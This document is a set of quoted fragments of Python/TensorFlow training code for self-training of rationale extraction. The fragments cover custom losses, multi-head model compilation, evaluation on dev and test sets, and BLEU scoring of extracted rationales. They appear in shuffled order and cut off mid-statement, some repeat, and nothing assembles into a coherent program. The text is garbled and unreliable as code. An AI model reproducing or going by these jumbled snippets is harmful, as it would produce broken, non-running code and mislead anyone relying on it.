verbose=0)[-2]", "elif 'joint' in type_: out = model.predict(X_unlabeled, batch_size=64) acc, y_pred, r_acc = out[0],", "GLOBAL_SEED = int(os.getenv(\"PYTHONHASHSEED\")) random.Random(GLOBAL_SEED).shuffle(indx) if len(indx) > unsup_size: indx = indx[:unsup_size] logger.info(\"Shape of", "np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:],", "np.ones(len(y_dev))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) elif 'joint_neg' in type_: logger.info(\"Training for", "[1.0, 1.0, 1.0, 1.0] if '_noexp' in type_: loss_weights = [1.0, 0.0, 
0.0,", "np.array([i for i in range(len(y_pred))]) acc = acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices]), axis=1)", "logger.info (\"Class labels {}\".format(labels)) #split X and y to train and dev with", "in type_: cce = SparseCategoricalFocalLoss(gamma=2, reduction=tf.keras.losses.Reduction.NONE) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss =", "logger.info(y_pred) return kb.mean(y_true*y_pred, axis=-1) with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier':", "logger.info(\"Training for without rationales\") with strategy.scope(): def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE)", "(task) {}\".format(task_acc)) max_task_acc = task_acc model.save_weights(model_file_best) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] test_task_acc", "rationales selected: {}\".format(np.mean(np.sum(attention_mask_r, axis=-1)))) attention_mask_r[:,0] = 1 negation_mask = np.where(attention_mask_r==0, 1, 0) negation_mask[:,0]", "(macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='micro'))) logger.info(\"Model performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='macro'))) logger.info(\"Model", "task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[3] val_loss = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[0] elif", "y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)], 
sample_weight=[X_conf[:,0], X_conf[:,1:], X_conf[:,0], np.ones((len(y_batch)))]) #", "[y_dev[:,0], y_dev, y_dev[:,0], y_neg_dev], verbose=0)[-3] if test_acc > max_test_acc: max_test_acc = test_acc test_task_acc", "y_test[:,0], np.full((len(y_test), len(labels)), 1/len(labels))]) task_acc, test_acc, r_acc = out[3], out[4], out[5] elif 'joint'", "elif 'joint' in type_: out = model.predict(X_test) class_acc, test_pred, r_acc = out[0], out[1],", "batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) tf.keras.backend.clear_session() if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model", "temp['text'] = ' '.join(text) temp['truth'] = truth[i] temp['pred'] = pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split())", "temp_p, temp_t, ct = [],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] for j in range(0,len(test_pred[0])-1):", "{}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='micro'))) logger.info(\"Model performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='macro'))) logger.info(\"Model performance", "logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc = task_acc best_val_acc = task_acc model.save_weights(model_file_best) #_student", "y_dev[:,1:]]) elif '_neg' in type_ : y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:],", "0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] #logger.info(\"Test sample {}\".format(temp)) for j in range(0,len(test_pred[0])-1): if test_pred[i][j]", "rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_mtl(TFModel, Config, 
pt_teacher_checkpoint, max_seq_length,", "axis=0) #X_conf = np.ones((len(X_batch['input_ids']), max_seq_length)) for i in range(len(cls)): X_conf[i,0] = class_weight[cls[i][0]]*X_conf[i,0] #logger.info", "(teacher model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on test set (teacher model):", "= (probs+1e-10) #+(1-y_batch[:,0])*np.log(1-probs+1e-10)) log_rationale = (probs_rat+1e-10) if 'rwt' in type_: #re-weight labels X_conf[:,0]", "dict() temp['text'] = ' '.join(text) temp['truth'] = truth[i] temp['pred'] = pred[i] temp['score'] =", "r_acc = np.argmax(r_acc, axis=-1) #compute confidence on the unlabeled set if sample_size <", "if test_pred[i][j] == 1: temp_p.append(temp[j]) if y_test[i][j+1] == 1: temp_t.append(temp[j]) pred_1 += test_pred[i].sum()", "rat_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) y_neg = np.full((len(y_train),len(labels)),", "predictions shape {}\".format(class_acc.shape)) logger.info(\"Teacher model best score (macro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='macro'))) logger.info(\"Teacher model", "'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices]}, y_pred[indices] else: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids':", "0. 
if 'mtl' in type_: logger.info(\"y_test: {}\".format(y_test)) test_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[4]", "elif 'joint' in type_: out = model.evaluate(X_test, [y_test[:,0], y_test, y_test[:,0], np.ones(len(y_test))]) task_acc, test_acc,", "os.path.join(model_dir, \"model_best.h5\") if os.path.exists(model_file): model.load_weights(model_file) #model_task.load_weights(model_file_task) best_base_model = model logger.info (\"Model file loaded", "(\"Starting loop {}\".format(epoch)) if type_ == 'mtl': test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-1]", "np.ones(len(y_dev))], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] val_loss = model.evaluate(X_dev,", "indices = [] for i in labels: indx = np.where(y_batch[:,0]==i)[0] GLOBAL_SEED = int(os.getenv(\"PYTHONHASHSEED\"))", "on {} number of instances\".format(len(X_unlabeled[\"input_ids\"]))) X_unlabeled_sample = X_unlabeled #X_unlabeled_sample = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids':", "loss_weights = [1.0, 1.0, 0, 0] model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':rat_loss, 'rationale_task_classifier': None,", "fn += (y_test[i].sum()-ct) p = tp/(tp+fp+0.0000001) r = tp/(tp+fn+0.0000001) logger.info(\"Token-level: {}\".format((tp)/(tp+(0.5*(fp+fn))))) logger.info(\"Rationale coverage", "else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_joint(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob,", "logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc = task_acc model.save_weights(model_file_best) val_acc = model.evaluate(X_dev, 
[y_dev[:,0],", "if '_noexp' in type_: loss_weights = [1.0, 0, 0, 0] elif '_no_suffcomp' in", "import nltk import tensorflow as tf import tensorflow.keras as K import tensorflow.keras.backend as", "y_dev[:,1:]], verbose=0)[-1] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]],", "1:] = np.where(y_pred[i]==0, 103, X_sample[\"input_ids\"][i, 1:]) if '_neg' in type_: X_negation_sample[\"input_ids\"][i, 1:] =", "= truth[i] temp['pred'] = pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_'+type_+'.json'), 'w')", "= SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_joint(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels),", "tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.Mean(name='mean')]) #X_batch.update(X_rationale_batch) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch,", "shape: {}\".format(X_conf.shape)) if 'mtl' in type_: #model = model_student logger.info(y_batch.shape) model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:]],", "np.concatenate((acc, y_pred), axis=1) logging.info(\"y_batch shape {}\".format(y_batch.shape)) indices = [] for i in labels:", "tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0)) #l2_loss = 0.0 #logger.info(l1_loss) return cce_loss + 0.1*l1_loss", "type_=type_) probs = y_val[indices] probs_rat = y_rat[indices] cls = list(acc[indices]) logger.info(cls) X_conf =", "average='macro'))) val_loss = model.evaluate(X_dev, 
[y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[0] if task_acc > max_task_acc:", "X_conf[:,1:]]) elif type_ == 'joint': logger.info(type_) def custom_loss(y_true, y_pred): logger.info(y_pred) return kb.mean(y_true*y_pred, axis=-1)", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance': None}) elif 'joint_neg'", "= np.argmax(acc, axis=-1) elif 'joint' in type_: if 'pruthi_' in type_: out =", "acc (task) {}\".format(task_acc)) max_task_acc = task_acc best_val_acc = task_acc model.save_weights(model_file_best) #_student = deepcopy(model)", "0.1*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus))", "{}\".format(X_unlabeled[\"input_ids\"].shape)) strategy = tf.distribute.MirroredStrategy() gpus = strategy.num_replicas_in_sync logger.info('Number of devices: {}'.format(gpus)) #run the", "if valid_split > 0: train_size = int((1. - valid_split)*len(X[\"input_ids\"])) if '_neg' in type_:", "for Self-training for Rationale using few-shot learning. 
This code base is adapted from", "task=None): #labels = [0, 1] #fix hardcoding labels = set(y[:,0]) logger.info (\"Class labels", "= model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[3] val_loss = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[0] elif '_neg'", "np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": attention_mask_r} #mask tokens that are not rationales u-r if '_neg' in", "for i in range(len(y_pred)): X_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, 103, X_sample[\"input_ids\"][i, 1:]) if '_neg'", "#X_batch.update(X_rationale_batch) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch, y_batch[:, 0],", "0, 0] elif '_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0, 0] '''", "f1_score from sklearn.metrics import precision_recall_fscore_support logger = logging.getLogger('STRationale') def create_learning_rate_scheduler(max_learn_rate=5e-5, end_learn_rate=1e-7, warmup_epoch_count=10, total_epoch_count=90):", "type_: out = model.evaluate(X_test, [y_test[:,0], y_test, y_test[:,0], np.ones(len(y_test))]) task_acc, test_acc, r_acc = out[3],", "{} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on test set (student model): {} \".format(score4/len(pred)))", "[y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3]", "\"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_pred[indices] if type_ == 'decoupled' or ('joint' in type_): X_sample =", "class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]]) elif '_neg' in type_ : y_neg =", "pred_0+= max_seq_length-pred_1 truth_1 += y_test[i].sum() truth_0+= max_seq_length-truth_1 
pred.append(' '.join(temp_p)) truth.append(' '.join(temp_t)) for word", "temp_t.remove(word) else: fp+=1 tp +=ct fn += (y_test[i].sum()-ct) p = tp/(tp+fp+0.0000001) r =", "val_loss model.save_weights(model_file_best) #_student = deepcopy(model) ''' if test_acc > max_test_acc: max_test_acc = test_acc", "{}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) elif 'joint' in type_: out = model_student.predict(X_test) acc, y_pred, r_acc", "to train and dev with valid_split if valid_split > 0: train_size = int((1.", "counter == 0: logger.info(model.summary()) model_file = os.path.join(model_dir, \"model_label.h5\") model_file_task = os.path.join(model_dir, \"model_task.h5\") model_file_best", "on test set (teacher model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on test", "[y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0)[-3] if '_neg' in type_: y_neg_dev = np.full((len(y_dev), len(labels)),", "# class_weight=class_weight) tf.keras.backend.clear_session() if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved to {}\".format(model_file))", "indices.extend(indx) indices = np.asarray(indices) #indices = np.random.choice(len(X_unlabeled_sample['input_ids']), unsup_size, replace=False) X_batch, y_batch = {\"input_ids\":", "= model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.full((len(y_test), len(labels)), 1/len(labels))]) task_acc, test_acc, r_acc = out[3],", "callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:], X_conf[:,0], np.ones((len(y_batch)))]) # class_weight=class_weight) if 'fine_tune_teacher' in type_:", "[y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-3]", "unlabeled set if 'uni' in sample_scheme: logger.info (\"Sampling 
uniformly\") if unsup_size < len(X_unlabeled_sample['input_ids']):", "'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = [1.0,", "pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_teacher_'+type_+'.json'), 'w') as f: json.dump(data, f)", "in type_ : y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:], y_train[:,0], y_neg], shuffle=True,", "y_train[:,1:], y_train[:,0], y_neg], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=sup_batch_size*1,", "1/len(labels)) y_dev_plg = [y_dev[:,1:], y_dev[:,0], np.full((len(y_dev),len(labels)), 1/len(labels))] y_test_plg = [y_test[:,1:], y_test[:,0], np.full((len(y_test),len(labels)), 1/len(labels))]", "total_epoch_count=90): def lr_scheduler(epoch): if epoch < warmup_epoch_count: res = (max_learn_rate/warmup_epoch_count) * (epoch +", "y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) elif 'joint' in type_:", "X_conf[:,1:], X_conf[:,0], np.ones((len(y_batch)))]) # class_weight=class_weight) if 'fine_tune_teacher' in type_: rat_loss = None if", "#logger.info (X_unlabeled_sample[\"input_ids\"][:5]) if 'joint' in type_: ids = [] attention_mask_r = np.ones((len(y_pred), max_seq_length))", "= tf.nn.softmax(X_conf[:,0], axis=0) if '_r_' in type_: #re-weight rationales X_conf[:,1:] = np.where(log_rationale>0, log_rationale,", "np.concatenate((acc[indices], y_pred[indices]), axis=1) X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]} if 'joint'", "'_neg' in type_: 
X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size],", "valid_split=0.5, sup_epochs=70, unsup_epochs=25, N_base=10, dense_dropout=0.5, attention_probs_dropout_prob=0.3, hidden_dropout_prob=0.3, test_data=None, unlabeled_data=None, class_weight=None, type_=\"token\", X_dev=None, y_dev=None,", "type_: out = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.full((len(y_test), len(labels)), 1/len(labels))]) task_acc, test_acc, r_acc", "= {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices], 'input_ids_neg':X_unlabeled['input_ids_neg'][indices], 'token_type_ids_neg':X_unlabeled['token_type_ids_neg'][indices], 'attention_mask_neg':X_unlabeled['attention_mask_neg'][indices]},", "= model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]) logger.info (\"Validation loss for run {} :", "strategy.num_replicas_in_sync logger.info('Number of devices: {}'.format(gpus)) #run the base model n times with different", "def custom_loss(y_true, y_pred): logger.info(y_pred) return kb.mean(y_true*y_pred, axis=-1) with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),", "= [0.5, 0.5] with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], 
metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\")", "[y_test[:,0], y_test[:,1:]], verbose=0) logger.info(\"Print acc (task) for joint {}\".format(temp)) logger.info (\"Val acc (token)", "0.0, 0.0 for i in range(len(pred)): score1 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(1, 0, 0, 0))", "epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': custom_loss}, metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.Mean(name='mean')])", "verbose=0) logger.info(\"Print acc (task) for joint {}\".format(temp)) logger.info (\"Val acc (token) {}\".format(test_acc)) logger.info", "X_train, y_train = X, y X_dev, y_dev = X_dev, y_dev logger.info(\"X Train Shape:", "model for run {}: {}\".format(counter, test_pred)) tp, fn, fp = 0, 0, 0", "'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices], 'input_ids_neg':X_unlabeled['input_ids_neg'][indices], 'token_type_ids_neg':X_unlabeled['token_type_ids_neg'][indices], 'attention_mask_neg':X_unlabeled['attention_mask_neg'][indices]}, y_pred[indices] elif 'joint' in type_: X_unlabeled_sample, y_pred =", "in type_: loss_weights = [1.0, 0, 0, 0] elif '_no_suffcomp' in type_: loss_weights", "run {} : {}\".format(counter, val_loss)) if val_loss[0] < best_validation_loss: best_base_model = model best_validation_loss", "val_loss[0] model = best_base_model ''' if 'mtl' in type_: logger.info (\"Best validation acc", "= np.argmax(y_pred, axis=-1) #.flatten() acc = 
np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) #compute", "np.full((len(y_test), len(labels)), 1/len(labels))]) task_acc, test_acc, r_acc = out[3], out[4], out[5] elif 'joint' in", "val_loss = 0. if 'mtl' in type_: logger.info(\"y_test: {}\".format(y_test)) test_acc = model.evaluate(X_test, [y_test[:,0],", "#y_rat = y_rat[:, 1:] #y_pred = y_pred[:,1:] # sample from unlabeled set if", "= [1.0, 0.0] else: loss_weights = [0.5, 0.5] with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),", "verbose=0)[-1] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[0]", "epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss", "res = (max_learn_rate/warmup_epoch_count) * (epoch + 1) else: res = max_learn_rate*math.exp(math.log(end_learn_rate/max_learn_rate)*(epoch-warmup_epoch_count+1)/(total_epoch_count-warmup_epoch_count+1)) return float(res)", "y_train.shape)) logger.info(\"X Dev Shape: {} {}\".format(X_dev[\"input_ids\"].shape, y_dev.shape)) logger.info(\"X Test Shape: {} {}\".format(X_test[\"input_ids\"].shape, y_test.shape))", "or ('joint' in type_): X_sample = {\"input_ids\": X_sample['input_ids'][indices], \"token_type_ids\": X_sample['token_type_ids'][indices], \"attention_mask\": X_sample['attention_mask'][indices]} '''", "y_test_plg = [y_test[:,1:], y_test[:,0], np.full((len(y_test),len(labels)), 1/len(labels))] test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev],", "#l2_loss = 0.0 #logger.info(l1_loss) return cce_loss + 0.1*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred):", "y_dev[:,1:]]), 
batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]]) elif", "= None, None, None if 'mtl' in type_: acc, y_pred = model.predict(X_unlabeled_sample, batch_size=256)", "len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) y_dev_plg = [y_dev[:,1:], y_dev[:,0], np.full((len(y_dev),len(labels)), 1/len(labels))]", "as tf import tensorflow.keras as K import tensorflow.keras.backend as kb import tensorflow_addons as", "test_pred = np.argmax(tf.nn.softmax(test_pred, axis=-1), axis=-1) logger.info(\"Printing prediction data on teacher model for run", "acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) #compute confidence on the unlabeled", "Precision: {}\".format(p)) logger.info(\"Token overlap: {}\".format(tp/(tp+fp+fn))) score1, score2, score3, score4 = 0.0, 0.0, 0.0,", "'joint': # or 'joint_neg' in type_: test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))],", "learning. 
This code base is adapted from UST (https://github.com/microsoft/UST) \"\"\" from collections import", "score: {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) logger.info(\"Best token acc score: {}\".format(precision_recall_fscore_support(y_pred, y_test[:,1:], average='macro'))) pred, truth", "and y to train and dev with valid_split if valid_split > 0: train_size", "return cce_loss + 0.01*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE)", "= {\"input_ids_r\": X_sample['input_ids'][indices], \"token_type_ids_r\": X_sample['token_type_ids'][indices], \"attention_mask_r\": X_sample['attention_mask'][indices]} if '_neg' in type_: X_neg_rationale_batch =", "(student model): {} \".format(score4/len(pred))) data = [] for i in range(len(X_test[\"input_ids\"])): text =", "+ 0.01*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true,", "axis=-1).numpy(), axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) elif 'joint'", "1.0] ''' if '_noexp' in type_: loss_weights = [1.0, 0, 0, 0] elif", "type_: X_negation_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": negation_mask} for i in range(len(y_pred)):", "restore_best_weights=True)]) #, class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]) elif", "weights=(0, 0, 1, 0)) score4 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 0, 1)) logger.info(\"BLEU-1 score", "= logging.getLogger('STRationale') def create_learning_rate_scheduler(max_learn_rate=5e-5, 
end_learn_rate=1e-7, warmup_epoch_count=10, total_epoch_count=90): def lr_scheduler(epoch): if epoch < warmup_epoch_count:", "set (teacher model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on test set (teacher", "np.argmax(acc1, axis=-1) r_acc1 = np.argmax(r_acc1, axis=-1) logger.info(\"Model performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:],", "logger.info(\"Extracted rationale from teacher model as input for task: {}\".format(X_negation_sample[\"input_ids\"][:5])) y_mean, y_var, y_T", "tf.nn.softmax(X_conf[:,0], axis=0) if '_r_' in type_: #re-weight rationales X_conf[:,1:] = np.where(log_rationale>0, log_rationale, 0.000000001)", "run {} : {}\".format(counter, test_acc)) logger.info (\"Best Test task acc for run {}", "= np.argmax(class_acc, axis=-1) logger.info(\"Class predictions shape {}\".format(class_acc.shape)) logger.info(\"Teacher model best score (macro/task): {}\".format(precision_recall_fscore_support(class_acc,", "'_neg' in type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} elif 'joint'", "return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) model = models.construct_teacher_joint_neg(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob)", "1: temp_p.append(temp[j]) if y_test[i][j+1] == 1: temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1", "X_sample = {\"input_ids\": X_sample['input_ids'][indices], \"token_type_ids\": X_sample['token_type_ids'][indices], \"attention_mask\": X_sample['attention_mask'][indices]} ''' #acc = acc[:,None] #y_batch", "= [1.0, 1.0, 0, 0] 
